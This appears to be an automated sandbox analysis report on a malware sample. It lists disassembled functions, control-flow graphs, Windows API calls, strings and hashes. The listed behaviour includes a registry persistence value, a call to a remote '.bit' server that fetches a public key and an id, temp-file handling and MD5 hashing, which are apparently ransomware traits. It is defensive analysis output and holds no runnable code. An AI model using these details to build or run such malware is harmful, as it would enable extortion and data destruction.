                                                                                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                                        • API String ID: 4174345323-1723836103
                                                                                                                                                                        • Opcode ID: 455ec25602f33aae56d3a80227ba74c366724fa8dec49508d6252fbffdb6b90e
                                                                                                                                                                        • Instruction ID: 1eece3a8e33631e718f0a604d6b1921734efaf28e13f3c81aa286874ac1f0673
                                                                                                                                                                        • Opcode Fuzzy Hash: 455ec25602f33aae56d3a80227ba74c366724fa8dec49508d6252fbffdb6b90e
                                                                                                                                                                        • Instruction Fuzzy Hash: 0332A0B1E006289AEF629F64DC45B9EB7B9FF41700F0541EAE60CE6191EB708E80CF55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FE690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 776 2fe690-2fe6d8 call 30f7c0 timeGetTime call 303f74 call 2ec6a0 783 2fe6e0-2fe6e6 776->783 784 2fe6f0-2fe722 call 30b420 call 2ec500 783->784 789 2fe72e-2fe772 InternetOpenW 784->789 790 2fe724-2fe729 784->790 792 2fe778-2fe77d 789->792 793 2fe774-2fe776 789->793 791 2fea1f-2fea40 call 303cf0 790->791 800 2fea8d-2feacc lstrlenA lstrcpyA * 2 lstrlenA 791->800 801 2fea42-2fea46 791->801 796 2fe780-2fe789 792->796 795 2fe78f-2fe7b8 call 2f5ae0 call 301c02 793->795 816 2fe7be-2fe7f7 call 2f4690 call 2edd40 795->816 817 2fe882-2fe8e5 call 2f5ae0 call 2f3ff0 call 2f2900 call 2f59d0 795->817 796->796 798 2fe78b-2fe78d 796->798 798->795 805 2feaef-2feb12 800->805 806 2feace 800->806 803 2fea4c-2fea61 SHGetFolderPathA 801->803 804 2fee2a call 2f1b10 801->804 803->784 808 2fea67-2fea88 PathAppendA DeleteFileA 803->808 818 2fee2f-2fee3a 804->818 812 2feb18-2feb1f 805->812 813 2feb14-2feb16 805->813 809 2fead0-2fead8 806->809 808->784 814 2feaeb 809->814 815 2feada-2feae7 lstrlenA 809->815 820 2feb22-2feb27 812->820 819 2feb2b-2feb4f call 2f56d0 call 2f2900 813->819 814->805 815->809 822 2feae9 815->822 845 2fe86f-2fe874 816->845 846 2fe7f9-2fe7fe 816->846 873 2fe8e7-2fe8f0 call 302587 817->873 874 2fe8f3-2fe917 lstrcpyW 817->874 824 2fee4d-2fee82 call 2eef50 818->824 825 2fee3c-2fee3f 818->825 843 2feb53-2feb66 lstrcpyW 819->843 844 2feb51 819->844 820->820 827 2feb29 820->827 822->805 836 2fee86-2fee8c 824->836 825->783 827->819 840 2fee8e-2fee90 836->840 841 2fee92-2fee94 836->841 849 2feea0-2feeaf call 2f3ea0 840->849 851 2fee97-2fee9c 841->851 852 2feb68-2feb71 call 302587 843->852 853 2feb74-2febe4 lstrlenA call 300c62 call 30b420 MultiByteToWideChar lstrcpyW call 303cf0 843->853 844->843 845->817 854 2fe876-2fe87f call 302587 845->854 847 2fe80c-2fe827 846->847 848 2fe800-2fe809 call 302587 846->848 856 2fe829-2fe82d 847->856 857 2fe842-2fe848 847->857 848->847 849->836 875 2feeb1-2feee3 call 2eef50 849->875 851->851 859 2fee9e 851->859 852->853 896 2fec3d-2fec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 853->896 897 2febe6-2febea 853->897 854->817 865 2fe82f-2fe840 call 3005a0 856->865 866 2fe84e-2fe86c 856->866 857->866 859->849 865->866 866->845 873->874 879 2fe919-2fe920 874->879 880 2fe943-2fe97a InternetOpenUrlW InternetReadFile 874->880 895 2feee7-2feeed 875->895 879->880 886 2fe922-2fe92e 879->886 883 2fe9ec-2fea08 InternetCloseHandle * 2 880->883 884 2fe97c-2fe994 SHGetFolderPathA 880->884 891 2fea0a-2fea13 call 302587 883->891 892 2fea16-2fea19 883->892 884->883 890 2fe996-2fe9c2 PathAppendA call 3020b6 884->890 893 2fe937 886->893 894 2fe930-2fe935 886->894 890->883 913 2fe9c4-2fe9e9 lstrlenA call 302b02 call 303a38 890->913 891->892 892->791 900 2fe93c-2fe93d lstrcatW 893->900 894->900 901 2feeef-2feef1 895->901 902 2feef3-2feef5 895->902 906 2fecbf-2fecdd 896->906 907 2fec99 896->907 897->804 904 2febf0-2fec11 SHGetFolderPathA 897->904 900->880 909 2fef01-2fef10 call 2f3ea0 901->909 903 2feef8-2feefd 902->903 903->903 910 2feeff 903->910 904->784 911 2fec17-2fec38 PathAppendA DeleteFileA 904->911 915 2fecdf-2fece1 906->915 916 2fece3-2feced 906->916 914 2feca0-2feca8 907->914 909->895 924 2fef12-2fef4c call 2f3ff0 call 2f2900 909->924 910->909 911->783 913->883 919 2fecbb 914->919 920 2fecaa-2fecb7 lstrlenA 914->920 921 2fecf9-2fed1b call 2f56d0 call 2f2900 915->921 922 2fecf0-2fecf5 916->922 919->906 920->914 926 2fecb9 920->926 936 2fed1f-2fed35 lstrcpyW 921->936 937 2fed1d 921->937 922->922 927 2fecf7 922->927 941 2fef4e 924->941 942 2fef50-2fef68 lstrcpyW 924->942 926->906 927->921 939 2fed37-2fed40 call 302587 936->939 940 2fed43-2fedab lstrlenA call 300c62 call 30b420 MultiByteToWideChar lstrcpyW lstrlenW 936->940 937->936 939->940 957 2fedad-2fedb6 lstrlenW 940->957 958 2fedbc-2fedc1 940->958 941->942 945 2fef6a-2fef73 call 302587 942->945 946 2fef76-2fefb3 call 2f3ff0 call 2f2900 942->946 945->946 961 2fefb7-2fefc6 lstrcpyW 946->961 962 2fefb5 946->962 957->958 963 2fee44-2fee48 957->963 959 2fedc3-2fede4 SHGetFolderPathA 958->959 960 2fee10-2fee12 958->960 959->784 964 2fedea-2fee0b PathAppendA DeleteFileA 959->964 965 2fee1d-2fee1f 960->965 966 2fee14-2fee1a call 300bed 960->966 967 2fefc8-2fefd1 call 302587 961->967 968 2fefd4-2fefe0 961->968 962->961 969 2ff01a-2ff030 963->969 964->783 965->804 971 2fee21-2fee27 call 300bed 965->971 966->965 967->968 973 2fefee-2ff008 968->973 974 2fefe2-2fefeb call 302587 968->974 971->804 979 2ff00a-2ff013 call 302587 973->979 980 2ff016 973->980 974->973 979->980 980->969
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,003AB3EC,000000FF), ref: 002FE6C0
                                                                                                                                                                          • Part of subcall function 002EC6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,002FE6D4), ref: 002EC6C2
                                                                                                                                                                          • Part of subcall function 002EC6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 002EC6F3
                                                                                                                                                                          • Part of subcall function 002EC6A0: RegCloseKey.ADVAPI32(00000000), ref: 002EC700
                                                                                                                                                                        • _memset.LIBCMT ref: 002FE707
                                                                                                                                                                          • Part of subcall function 002EC500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 002EC51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 002FE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 002FE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 002FE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 002FE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 002FE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002FE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002FE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 002FE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002FE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002FE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 002FEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 002FEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 002FEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 002FEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 002FEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 002FEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 002FEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEC32
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 002FEC3E
                                                                                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 002FEC51
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEC6D
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEC7F
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEC93
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 002FECB3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FED2A
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FED4B
                                                                                                                                                                        • _malloc.LIBCMT ref: 002FED55
                                                                                                                                                                        • _memset.LIBCMT ref: 002FED63
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 002FED7D
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FED85
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 002FEDA3
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 002FEDAE
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEDD3
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEDF7
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEE05
                                                                                                                                                                        • _free.LIBCMT ref: 002FEE15
                                                                                                                                                                        • _free.LIBCMT ref: 002FEE22
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEF61
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEFBF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 704684250-3586605218
                                                                                                                                                                        • Opcode ID: 68603a39e96f6117c9ed2a11793131f800697274207b9a34facb43b8febd3f6e
                                                                                                                                                                        • Instruction ID: f158fcb250b9d22b5f4439e3a54ee11fcfcc6cd4c830a4b13528f26d9049202b
                                                                                                                                                                        • Opcode Fuzzy Hash: 68603a39e96f6117c9ed2a11793131f800697274207b9a34facb43b8febd3f6e
                                                                                                                                                                        • Instruction Fuzzy Hash: 00422971518345AFDB22EF24CC49BABBBE8BF45344F00092CF58597292DB74D618CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F0FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 002F1010
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F1026
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 002F103B
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F1051
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 002F1059
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 002F1064
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F107A
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 002F1099
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F10AB
                                                                                                                                                                        • _memset.LIBCMT ref: 002F10CA
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 002F10DE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F10F0
                                                                                                                                                                        • _malloc.LIBCMT ref: 002F1100
                                                                                                                                                                        • _memset.LIBCMT ref: 002F110B
                                                                                                                                                                        • _sprintf.LIBCMT ref: 002F112E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 002F113C
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 002F1154
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 002F115F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 2451520719-213608013
                                                                                                                                                                        • Opcode ID: c519f9ec4fb252162e41ea88cdcd3db50dc8a6d559aeddf0932f5f218d36d17e
                                                                                                                                                                        • Instruction ID: a2c1ed5f9408b5169edf07fe98b3a97be63de7fae6d9312e197e5f1687e4d655
                                                                                                                                                                        • Opcode Fuzzy Hash: c519f9ec4fb252162e41ea88cdcd3db50dc8a6d559aeddf0932f5f218d36d17e
                                                                                                                                                                        • Instruction Fuzzy Hash: 9151AD71D40219EBDB12DFA5DC46FEFBBB8EF04744F100125FA04B6180EB759A508BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EF730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002F1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F1ACA
                                                                                                                                                                          • Part of subcall function 002F1AB0: DispatchMessageW.USER32(?), ref: 002F1AE0
                                                                                                                                                                          • Part of subcall function 002F1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F1AEE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 002EF900
                                                                                                                                                                        • _memmove.LIBCMT ref: 002EF9EA
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 002EFA51
                                                                                                                                                                        • _memmove.LIBCMT ref: 002EFADA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                        • Opcode ID: f77d86e82010e588bb72b8cc614fa8c450b624f3a3c1fbc535f1959e9ad07d0a
                                                                                                                                                                        • Instruction ID: 1059345f8e68b37cfdb39c4e3379ace9ad5dd83e68be9c6f50ec956ae40cc44a
                                                                                                                                                                        • Opcode Fuzzy Hash: f77d86e82010e588bb72b8cc614fa8c450b624f3a3c1fbc535f1959e9ad07d0a
                                                                                                                                                                        • Instruction Fuzzy Hash: 2152CE71D20249DBCF10DFA8C995BEEB7B4BF05304F604179E409AB281E771AA58CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EE870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1515 2ee870-2ee8d6 call 2f56d0 CryptAcquireContextW 1518 2ee8d8-2ee8e4 call 310eca 1515->1518 1519 2ee8e9-2ee901 CryptCreateHash 1515->1519 1518->1519 1521 2ee914-2ee930 CryptHashData 1519->1521 1522 2ee903-2ee90f call 310eca 1519->1522 1523 2ee932-2ee93e call 310eca 1521->1523 1524 2ee943-2ee961 CryptGetHashParam 1521->1524 1522->1521 1523->1524 1527 2ee974-2ee9a6 call 300be4 call 30b420 CryptGetHashParam 1524->1527 1528 2ee963-2ee96f call 310eca 1524->1528 1534 2ee9a8-2ee9b4 call 310eca 1527->1534 1535 2ee9b9-2ee9bb 1527->1535 1528->1527 1534->1535 1537 2ee9c0-2ee9c3 1535->1537 1538 2ee9c5-2ee9df call 3004a6 1537->1538 1539 2eea10-2eea31 call 302110 CryptDestroyHash CryptReleaseContext 1537->1539 1544 2ee9f2-2ee9f5 1538->1544 1545 2ee9e1-2ee9f0 call 2f3ea0 1538->1545 1546 2eea3e-2eea50 1539->1546 1547 2eea33-2eea3b call 302587 1539->1547 1549 2ee9f8-2ee9fd 1544->1549 1545->1537 1547->1546 1549->1549 1552 2ee9ff-2eea0e call 2f3ea0 1549->1552 1552->1537
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,003DFCA4,00000000,00000000), ref: 002EE8CE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE8E4
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 002EE8F9
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE90F
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 002EE928
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE93E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 002EE95D
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE96F
                                                                                                                                                                        • _memset.LIBCMT ref: 002EE98E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 002EE9A2
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE9B4
                                                                                                                                                                        • _sprintf.LIBCMT ref: 002EE9D3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1084002244-213608013
                                                                                                                                                                        • Opcode ID: fd220986f98234d7f12ee75b77cceba2f08aabbdb01e09fade5d591ff0b54c9e
                                                                                                                                                                        • Instruction ID: c40fe213a06a739e0ff5a0245035757ee9568c34b6e08f2ca88e91fb7ea21c70
                                                                                                                                                                        • Opcode Fuzzy Hash: fd220986f98234d7f12ee75b77cceba2f08aabbdb01e09fade5d591ff0b54c9e
                                                                                                                                                                        • Instruction Fuzzy Hash: 1151AE71D50249EADF16DFA5CC46FEEBBB8EF04704F100129FA01B61C1D7B5AA148BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EEAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1556 2eeaa0-2eeb09 call 2f56d0 CryptAcquireContextW 1559 2eeb1c-2eeb34 CryptCreateHash 1556->1559 1560 2eeb0b-2eeb17 call 310eca 1556->1560 1562 2eeb36-2eeb42 call 310eca 1559->1562 1563 2eeb47-2eeb56 CryptHashData 1559->1563 1560->1559 1562->1563 1565 2eeb58-2eeb64 call 310eca 1563->1565 1566 2eeb69-2eeb87 CryptGetHashParam 1563->1566 1565->1566 1568 2eeb9a-2eebcc call 300be4 call 30b420 CryptGetHashParam 1566->1568 1569 2eeb89-2eeb95 call 310eca 1566->1569 1575 2eebce-2eebda call 310eca 1568->1575 1576 2eebdf 1568->1576 1569->1568 1575->1576 1578 2eebe1-2eebe4 1576->1578 1579 2eec38-2eec67 call 302110 CryptDestroyHash CryptReleaseContext 1578->1579 1580 2eebe6-2eec00 call 3004a6 1578->1580 1585 2eec02-2eec11 call 2f3ea0 1580->1585 1586 2eec13-2eec19 1580->1586 1585->1578 1588 2eec20-2eec25 1586->1588 1588->1588 1590 2eec27-2eec36 call 2f3ea0 1588->1590 1590->1578
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,003DFCA4,00000000,00000000,00000000,?), ref: 002EEB01
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEB17
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 002EEB2C
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEB42
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 002EEB4E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEB64
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 002EEB83
